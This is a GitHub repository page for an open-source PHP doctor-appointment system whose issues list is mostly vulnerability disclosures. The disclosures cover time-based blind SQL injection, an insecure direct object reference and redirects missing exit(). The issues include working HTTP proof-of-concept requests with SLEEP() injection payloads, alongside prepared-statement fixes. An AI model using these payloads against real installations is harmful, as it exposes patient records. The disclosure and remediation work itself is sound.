hashenudara / edoc-doctor-appointment-system

This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.

License: MIT License

Languages: PHP 95.27%, CSS 4.28%, HTML 0.46%
Topics: css, doctor-appointment-management, html, mysql, php, sql, appointment-scheduling, appointment, appointment-booking, doctor-appointment-booking

edoc-doctor-appointment-system's Introduction

Hey there, I'm Hashen 👋🏻

Co-founder @xleron

A design-focused developer with a strong eye for aesthetics and a passion for crafting interactive and user-friendly web applications using technologies like Next.js, React, Tailwindcss & Webflow.

Who am I 👀

I thrive as a front-end developer, channeling my passion into creating remarkable web applications. My expertise lies in leveraging Next.js, React, & Node.js to build fast and scalable websites. I am committed to continuous learning and skill improvement within these domains, always striving to stay at the forefront of industry trends.

As a programming enthusiast, I have an insatiable appetite for knowledge and love to gather insights along my journey. Additionally, my design-focused approach ensures that I bring a keen sense of aesthetics to my projects, creating user-friendly experiences.

I'm really enjoying modern tech 🧑🏻‍💻

My Skills

Tools In My Arsenal 🛠️

Feel free to explore some of my projects and repositories on this profile. If you have any questions, or feedback, or just want to connect, don't hesitate to reach out. I'm open to collaboration and always on the lookout for new opportunities.

Thanks for stopping by my profile, and let's ignite some sparks together!

edoc-doctor-appointment-system's People

Contributors

hashenudara, pasquale007, r-krishita


edoc-doctor-appointment-system's Issues

Can we get in touch?

Hey HashenUdara,

I am writing a research paper about your website discussing a SQL-Injection vulnerability (CVE: CVE-2022-36543). My friend Pasqualle007 already provided the fix for it. I am interested in contacting you because I have some questions regarding your website. I would be very grateful for the opportunity to get in touch with you.

Best wishes

Alexej Kunz ~ Orchi1904

Blind SQL injection in login page

Page: login.php

https://github.com/HashenUdara/edoc-echanneling/blob/main/login.php#L48

HTTP request

POST /cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php HTTP/1.1
Host: localhost
Content-Length: 108
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=uqsd4tpq8bovkm9uadsfgvpjna
Connection: close

[email protected]' AND (SELECT 7037 FROM (SELECT(SLEEP(5)))FIpv) AND 'bqum'='bqum&userpassword=admin

Solution for Issue #9

Hey, I've got a solution for issue #9. Maybe you can drop me a message or email. I can't find any way to contact you :)

Found a vulnerability

Vulnerability file address

doctor/patient.php, from line 26: the problem is at line 36, header("location: ../login.php");. There is no exit() termination statement after the header() call in the else branch, so the code after it continues to execute, as long as a header like Cookie: PHPSESSID=foo is not passed in the HTTP request.

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

doctor/patient.php, from line 107: the $keyword parameter is controllable (the search12 parameter can be passed through POST) and $keyword is not protected against SQL injection, so line 151, $list11 = $database->query($sqlmain);, causes SQL injection.

......
......
......
  if($_POST){

    if(isset($_POST["search"])){
      $keyword=$_POST["search12"];

      $sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
      $selecttype="my";
    }
......
......
......

    <?php
      echo '<datalist id="patient">';
    $list11 = $database->query($sqlmain);
......
......
......

POC

POST /doctor/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(5)))PKsU) AND 'rUxx'='rUxx

Attack results pictures

image-20220806160637995
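As an added example (this is not code from the edoc project or its reporters), the two findings in the post above hardened in PHP with mysqli: the session guard calls exit() after header(), and the patient search passes the keyword as a bound parameter instead of interpolating it into the query. It assumes $database is a mysqli connection created by the project's connection.php and uses the patient table columns named in the report; the single "%keyword%" LIKE replaces the three overlapping LIKE clauses of the original query.

```php
<?php
// Added example (not code from the edoc project): hardened versions of the two
// patterns reported above. Assumes $database is a mysqli connection created by
// the project's connection.php, and the patient table columns named in the report.

// 1. Session guard. header() only queues a redirect; without exit() PHP keeps
//    running the page and the unauthenticated visitor still receives its output.
function requireRole(string $role): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['user']) || ($_SESSION['usertype'] ?? '') !== $role) {
        header('Location: ../login.php');
        exit(); // nothing below this line may run for an unauthenticated request
    }
    return $_SESSION['user'];
}

// 2. Patient search. The keyword is sent as a bound parameter, so a quote in it
//    is data rather than SQL. '%' and '_' are escaped so the caller cannot turn
//    the LIKE into "match every row" (MySQL's default LIKE escape is backslash).
function searchPatients(mysqli $database, string $keyword): array
{
    $like = '%' . addcslashes($keyword, '%_\\') . '%';
    $stmt = $database->prepare(
        'select pid, pname, pemail from patient where pemail=? or pname=? or pname like ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $database->error);
    }
    $stmt->bind_param('sss', $keyword, $keyword, $like);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Page usage (replaces the interpolated $sqlmain / $list11 code in the report).
$useremail = requireRole('d');
include '../connection.php';

$patients = [];
if (isset($_POST['search'], $_POST['search12'])) {
    $patients = searchPatients($database, (string) $_POST['search12']);
}
echo '<datalist id="patient">';
foreach ($patients as $row) {
    // escape on output as well: patient names are untrusted data in HTML
    echo '<option value="' . htmlspecialchars($row['pname'], ENT_QUOTES, 'UTF-8') . '">';
}
echo '</datalist>';
```

The same two changes apply to every other page in this issue list that carries the header()-without-exit() guard or a "$keyword" search string (doctor/doctors.php, patient/patient.php, patient/schedule.php, patient/appointment.php): the fix is a bound parameter, not escaping the input by hand.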

Found a vulnerability

Vulnerability file address

/patient/settings.php, from line 238: when $id is used in the query, there is no check that the id is the current user's id, so a user can view other users' information arbitrarily.

......
......
......
if($_GET){

  $id=$_GET["id"];
  $action=$_GET["action"];
......
......
......
elseif($action=='view'){
  $sqlmain= "select * from patient where pid='$id'";
  $result= $database->query($sqlmain);
  $row=$result->fetch_assoc();
  $name=$row["pname"];
  $email=$row["pemail"];
  $address=$row["paddress"];


  $dob=$row["pdob"];
  $nic=$row['pnic'];
  $tele=$row['ptel'];
......
......
......

POC

GET /patient/settings.php?action=view&id=1 HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=5b5upbno4c7dkhravnekcktsi6
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220806223812650

image-20220806224348440

Connection failed

Hi,
I have installed this repo but when I go to make an appointment/login/register I obtain an error:

Connection failed: Access denied for user 'root'@'localhost'

Any solution?

Found a vulnerability

Vulnerability file address

patient/delete-appointment.php, from line 3: the problem is at line 11, header("location: ../login.php");. There is no exit() termination statement after the header() call in the else branch, so the code after it continues to execute, as long as a header like Cookie: PHPSESSID=foo is not passed in the HTTP request.

......
......
......
  session_start();

if(isset($_SESSION["user"])){
  if(($_SESSION["user"])=="" or $_SESSION['usertype']!='a'){
    header("location: ../login.php");
  }

}else{
  header("location: ../login.php");
}
......
......
......

patient/delete-appointment.php, from line 15: the $sheduledate parameter is controllable (the sheduledate parameter can be passed through POST) and $sheduledate is not protected against SQL injection, so line 21, $sql= $database->query("delete from appointment where appoid='$id';");, causes SQL injection.

if($_GET){
  //import database
  include("../connection.php");
  $id=$_GET["id"];
  //$result001= $database->query("select * from schedule where scheduleid=$id;");
  //$email=($result001->fetch_assoc())["docemail"];
  $sql= $database->query("delete from appointment where appoid='$id';");
  //$sql= $database->query("delete from doctor where docemail='$email';");
  //print_r($email);
  header("location: appointment.php");
}

POC

GET /patient/delete-appointment.php?id=777'+(SELECT 0x5371724d WHERE 2432=2432 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))WZWf))+ HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220806194952674
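The settings.php "view" finding and the delete-appointment.php finding above share one root cause besides string-built SQL: an id taken from the request is trusted to belong to the caller. As an added example (not code from the edoc project), here is the ownership check carried into the queries themselves. It assumes $database is a mysqli connection, that $_SESSION['user'] holds the logged-in patient's email as in the project's session guard, and the patient and appointment columns that appear in the reports (pid, pemail, appoid).

```php
<?php
// Added example (not project code): object-level authorization plus bound
// parameters. Assumes $database is a mysqli connection and that
// $_SESSION['user'] holds the logged-in patient's email.

// Resolve the session user to their own patient id once; every later query is
// scoped to this value instead of trusting an id from the query string.
function currentPatientId(mysqli $database, string $sessionEmail): ?int
{
    $stmt = $database->prepare('select pid from patient where pemail=?');
    $stmt->bind_param('s', $sessionEmail);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ? (int) $row['pid'] : null;
}

// settings.php?action=view&id=N: the id is honoured only if it is the caller's own.
function viewOwnPatient(mysqli $database, int $ownPid, string $requestedId): ?array
{
    if (!ctype_digit($requestedId) || (int) $requestedId !== $ownPid) {
        return null; // someone else's record (or garbage): refuse without querying
    }
    $stmt = $database->prepare(
        'select pname, pemail, paddress, pdob, pnic, ptel from patient where pid=?'
    );
    $stmt->bind_param('i', $ownPid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// delete-appointment.php?id=N: the DELETE itself carries the ownership condition,
// so a foreign appoid deletes zero rows instead of someone else's booking.
function deleteOwnAppointment(mysqli $database, int $ownPid, string $requestedId): int
{
    if (!ctype_digit($requestedId)) {
        return 0;
    }
    $appoid = (int) $requestedId;
    $stmt = $database->prepare('delete from appointment where appoid=? and pid=?');
    $stmt->bind_param('ii', $appoid, $ownPid);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;
}

// Page usage, after the session guard has run and connection.php is included:
$ownPid = currentPatientId($database, $_SESSION['user']);
if ($ownPid === null) {
    header('Location: ../login.php');
    exit();
}
$deleted = deleteOwnAppointment($database, $ownPid, (string) ($_GET['id'] ?? ''));
if ($deleted === 0) {
    http_response_code(404); // not yours, or does not exist: same answer either way
    exit();
}
header('Location: appointment.php');
exit();
```

Returning the same 404 for "not found" and "not yours" avoids confirming that an appointment id exists, and the affected_rows check is what turns the ownership condition into an observable result rather than a silent no-op.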

Found a vulnerability

Vulnerability file address

patient/booking-complete.php, from line 27: the $scheduleid parameter is controllable (the scheduleid parameter can be passed through POST) and $scheduleid is not protected against SQL injection, so line 34, $result= $database->query($sql2);, causes SQL injection.

......
......
......
if($_POST){
        if(isset($_POST["booknow"])){
            $apponum=$_POST["apponum"];
            $scheduleid=$_POST["scheduleid"];
            $date=$_POST["date"];
            $scheduleid=$_POST["scheduleid"];
            $sql2="insert into appointment(pid,apponum,scheduleid,appodate) values ($userid,$apponum,$scheduleid,'$date')";
            $result= $database->query($sql2);
            //echo $apponom;
            header("location: appointment.php?action=booking-added&id=".$apponum."&titleget=none");

        }
    }
......
......
......

POC

POST /patient/booking-complete.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

booknow=1&apponum=5&scheduleid=1&date=2022-08-05&scheduleid=2 AND (SELECT 7093 FROM (SELECT(SLEEP(5)))RWzN)

Attack results pictures

image-20220806120107012
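The booking insert above concatenates unquoted numbers, and the PoC also relies on PHP keeping the last of two scheduleid fields, so $scheduleid ends up as "2 AND (SELECT ...)". As an added example (not code from the edoc project), here is the same insert with each value validated for its type and bound with mysqli's typed placeholders. It assumes $database is a mysqli connection and that $userid is the patient id resolved from the session rather than from the request.

```php
<?php
// Added example (not project code): booking-complete.php's insert with validated,
// typed parameters. Assumes $database is a mysqli connection and $userid is the
// patient id taken from the session, never from the request.

// Returns true when exactly one appointment row was inserted, false when any
// field failed validation (nothing is sent to the database in that case).
function bookAppointment(mysqli $database, int $userid, array $post): bool
{
    $intOpts    = ['options' => ['min_range' => 1]];
    $apponum    = filter_var($post['apponum'] ?? null, FILTER_VALIDATE_INT, $intOpts);
    $scheduleid = filter_var($post['scheduleid'] ?? null, FILTER_VALIDATE_INT, $intOpts);
    $rawDate    = (string) ($post['date'] ?? '');

    // '!' resets unspecified fields; trailing text such as " AND SLEEP(5)" makes
    // createFromFormat() return false, and the round-trip rejects dates like 02-30.
    $date = DateTime::createFromFormat('!Y-m-d', $rawDate);
    if ($apponum === false || $scheduleid === false
        || $date === false || $date->format('Y-m-d') !== $rawDate) {
        return false;
    }
    $appodate = $date->format('Y-m-d');

    $stmt = $database->prepare(
        'insert into appointment(pid,apponum,scheduleid,appodate) values (?,?,?,?)'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $database->error);
    }
    // i = integer, s = string: the driver sends each value as data, so a
    // "2 AND (SELECT ...)" scheduleid can never reach the SQL text.
    $stmt->bind_param('iiis', $userid, $apponum, $scheduleid, $appodate);
    $stmt->execute();
    $ok = ($stmt->affected_rows === 1);
    $stmt->close();
    return $ok;
}

// Page usage, after the session guard and connection.php:
if (isset($_POST['booknow'])) {
    if (!bookAppointment($database, $userid, $_POST)) {
        http_response_code(400);
        exit('invalid booking request');
    }
    header('Location: appointment.php?action=booking-added&id='
        . (int) $_POST['apponum'] . '&titleget=none');
    exit();
}
```

Validation here is defence in depth rather than the injection fix; the bound parameters are what make the query safe, and the validation keeps malformed bookings out of the table.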

Found a vulnerability

Vulnerability file address

create-account.php, from line 43: the $email parameter is controllable (the newemail parameter can be passed through POST) and $email is not protected against SQL injection, so line 59, $result= $database->query("select * from webuser where email='$email ';");, causes SQL injection.

......
......
......
if($_POST){

    $result= $database->query("select * from webuser");

    $fname=$_SESSION['personal']['fname'];
    $lname=$_SESSION['personal']['lname'];
    $name=$fname." ".$lname;
    $address=$_SESSION['personal']['address'];
    $nic=$_SESSION['personal']['nic'];
    $dob=$_SESSION['personal']['dob'];
    $email=$_POST['newemail'];
    $tele=$_POST['tele'];
    $newpassword=$_POST['newpassword'];
    $cpassword=$_POST['cpassword'];
    
    if ($newpassword==$cpassword){
        $result= $database->query("select * from webuser where email='$email';");
......
......
......

POC

POST /create-account.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/create-account.php
Cookie: PHPSESSID=oumjp2nqchjcrin2va1fh9n077
Upgrade-Insecure-Requests: 1

[email protected]' AND (SELECT 5395 FROM (SELECT(SLEEP(5)))Jkvf)-- erhH&tele=0712345678&newpassword=1&cpassword=1

Attack results pictures

image-20220805193423581

Security.md recommendation

Dear HashenUdara!

Based on Github Recommendation, please add a Security.md file to be able to contact you with details of discovered vulnerabilities of your application.

Thanks for your cooperation!
Looking forward to hearing from you!

Found a vulnerability

Vulnerability file address

doctor/doctors.php, from line 26: the problem is at line 36, header("location: ../login.php");. There is no exit() termination statement after the header() call in the else branch, so the code after it continues to execute, as long as a header like Cookie: PHPSESSID=foo is not passed in the HTTP request.

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

doctor/doctors.php, from line 166: the $keyword parameter is controllable (the search parameter can be passed through POST) and $keyword is not protected against SQL injection, so line 211, $result= $database->query($sqlmain);, causes SQL injection.

......
......
......
if($_POST){
  $keyword=$_POST["search"];

  $sqlmain= "select * from doctor where docemail='$keyword' or docname='$keyword' or docname like '$keyword%' or docname like '%$keyword' or docname like '%$keyword%'";
}else{
  $sqlmain= "select * from doctor order by docid desc";

}
......
......
......

                                
  $result= $database->query($sqlmain);
......
......
......

POC

POST /doctor/doctors.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

search=1' AND (SELECT 7687 FROM (SELECT(SLEEP(5)))rWjf)-- xSIp

Attack results pictures

image-20220806154122102

Found a vulnerability

Vulnerability file address

patient/schedule.php, from line 117: the $keyword parameter is controllable (the search parameter can be passed through POST) and $keyword is not protected against SQL injection, so line 133, $result= $database->query($sqlmain), causes SQL injection.

......
......
......
if($_POST){
                        //print_r($_POST);
                        
                        if(!empty($_POST["search"])){
                            
                            $keyword=$_POST["search"];
                            $sqlmain= "select * from schedule inner join doctor on schedule.docid=doctor.docid where schedule.scheduledate>='$today' and (doctor.docname='$keyword' or doctor.docname like '$keyword%' or doctor.docname like '%$keyword' or doctor.docname like '%$keyword%' or schedule.title='$keyword' or schedule.title like '$keyword%' or schedule.title like '%$keyword' or schedule.title like '%$keyword%' or schedule.scheduledate like '$keyword%' or schedule.scheduledate like '%$keyword' or schedule.scheduledate like '%$keyword%' or schedule.scheduledate='$keyword' )  order by schedule.scheduledate asc";
                            //echo $sqlmain;
                            $insertkey=$keyword;
                            $searchtype="Search Result : ";
                            $q='"';
                        }

                    }


                $result= $database->query($sqlmain)
......
......
......

POC

POST /patient/schedule.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/patient/schedule.php
Cookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12
Upgrade-Insecure-Requests: 1

search=1' AND SLEEP(5) AND 'tklr'='tklr

Attack results pictures

image-20220806105109131

Found a vulnerability

Vulnerability file address

patient/patient.php, from line 26: the problem is at line 36, header("location: ../login.php");. There is no exit() termination statement after the header() call in the else branch, so the code after it continues to execute, as long as a header like Cookie: PHPSESSID=foo is not passed in the HTTP request.

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

patient/patient.php, from line 106: the $keyword parameter is controllable (the search12 parameter can be passed through POST) and $keyword is not protected against SQL injection, so line 150, $list11 = $database->query($sqlmain);, causes SQL injection.

......
......
......
  if($_POST){

    if(isset($_POST["search"])){
      $keyword=$_POST["search12"];

      $sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
      $selecttype="my";
    }


    <?php
      echo '<datalist id="patient">';
    $list11 = $database->query($sqlmain);
......
......
......

POC

POST /patient/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(2)))PKsU) AND 'rUxx'='rUxx

Attack results pictures

image-20220806191211941

Found a vulnerability

Vulnerability file address

patient/appointment.php, from line 54: the $sheduledate parameter is controllable (the sheduledate parameter can be passed through POST) and $sheduledate is not protected against SQL injection, so line 72, $result= $database->query($sqlmain);, causes SQL injection.

......
......
......
if($_POST){
        //print_r($_POST);
        if(!empty($_POST["sheduledate"])){
            $sheduledate=$_POST["sheduledate"];
            $sqlmain.=" and schedule.scheduledate='$sheduledate' ";
        };
        //echo $sqlmain;
    }
    $sqlmain.="order by appointment.appodate  asc";
    $result= $database->query($sqlmain);
......
......
......

POC

POST /patient/appointment.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

sheduledate=1' AND (SELECT 3111 FROM (SELECT(SLEEP(5)))eooa)-- VhwP

Attack results pictures

image-20220806120634233

Found a vulnerability

patient/schedule.php

include("../connection.php");
$sqlmain= "select * from patient where pemail=?";
$stmt = $database->prepare($sqlmain);
$stmt->bind_param("s",$useremail);
$stmt->execute();
$result = $stmt->get_result();
$userfetch=$userrow->fetch_assoc();
$userid= $userfetch["pid"];
$username=$userfetch["pname"];

Error: Warning: Undefined variable $userrow in /Applications/MAMP/htdocs/edoc/patient/schedule.php on line 47

Fatal error: Uncaught Error: Call to a member function fetch_assoc() on null in patient/schedule.php:47 Stack trace: #0 {main} patient/schedule.php on line 47

Found a vulnerability

admin/add-new.php, from line 47: the $email parameter is controllable (the email parameter can be passed through POST) and $email is not protected against SQL injection, so line 54, $result= $database->query("select * from webuser where email='$email';");, causes SQL injection.

    if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $spec=$_POST['spec'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];
        
        if ($password==$cpassword){
            $error='3';
            $result= $database->query("select * from webuser where email='$email';");
            if($result->num_rows==1){
                $error='1';
            }else{

                $sql1="insert into doctor(docemail,docname,docpassword,docnic,doctel,specialties) values('$email','$name','$password','$nic','$tele',$spec);";
                $sql2="insert into webuser values('$email','d')";
                $database->query($sql1);
                $database->query($sql2);

                //echo $sql1;
                //echo $sql2;
                $error= '4';
                
            }
            
        }else{
            $error='2';
        }
    
    
        
        
    }else{
        //header('location: signup.php');
        $error='3';
    }
    

POC

POST /admin/add-new.php HTTP/1.1
Host: 192.168.0.104
Content-Length: 61
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.104/admin/doctors.php?action=add&error=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=mpu5jiv1ln63f3hrl1avff7if7
Connection: close

name=1&email=' AND (SELECT 7810 FROM (SELECT(SLEEP(5)))POrN) AND 'FCcW'='FCcW&nic=4&Tele=5&spec=1&password=6&cpassword=6

Attack results pictures

image

Found a vulnerability

Vulnerability file address

patient/edit-user.php, from line 11: the $email parameter is controllable (the email parameter can be passed through POST) and $email is not protected against SQL injection, so line 27, $result= $database->query($aab);, causes SQL injection.

......
......
......
  if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $oldemail=$_POST["oldemail"];
        $address=$_POST['address'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];
        $id=$_POST['id00'];
        
        if ($password==$cpassword){
            $error='3';
            $aab="select patient.pid from patient inner join webuser on patient.pemail=webuser.email where webuser.email='$email';";
            $result= $database->query($aab);
            //$resultqq= $database->query("select * from doctor where docid='$id';");
            if($result->num_rows==1){
                $id2=$result->fetch_assoc()["pid"];
......
......
......

POC

POST /patient/edit-user.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

email=' AND (SELECT 9021 FROM (SELECT(SLEEP(5)))BPzc)-- aeMt&password=1&cpassword=1

Attack results pictures

image-20220805233806265
